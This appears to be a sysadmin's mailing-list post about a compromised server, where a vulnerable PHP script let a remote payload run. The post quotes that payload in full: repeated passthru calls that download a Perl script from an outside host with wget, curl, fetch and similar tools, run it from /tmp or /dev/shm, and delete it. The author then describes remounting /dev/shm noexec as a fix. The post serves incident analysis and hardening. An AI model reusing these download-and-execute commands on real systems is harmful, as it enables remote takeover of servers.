Hi folks
I found the issue, it is one of the php script allowing the
remote script to run.
and the remote script is something like:
<?php
passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
bb.txt;rm -f bb.txt*');
passthru('cd /tmp;curl -o bb.txt
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /tmp;lwp-download
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /tmp;lynx -source http://www.radiovirtual.org/bb.txt >
bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /tmp;fetch http://www.radiovirtual.org/bb.txt >
bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /tmp;GET http://www.radiovirtual.org/bb.txt >
bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;wget http://www.radiovirtual.org/bb.txt;perl
bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;curl -o bb.txt
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;lwp-download
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;lynx -source http://www.radiovirtual.org/bb.txt
> bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;fetch http://www.radiovirtual.org/bb.txt >
bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt >
bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('id');
?>
the /tmp was mounted as rw,noexec,nosuid, so it cannot run.
but not the /dev/shm, so the hacked script downloaded to
/dev/shm, and run from there.
what kind applications are using /dev/shm? I googled
around,seem not find much information.
right now I mount i as rw,noexec,nosuid.
Best Regards
Mike
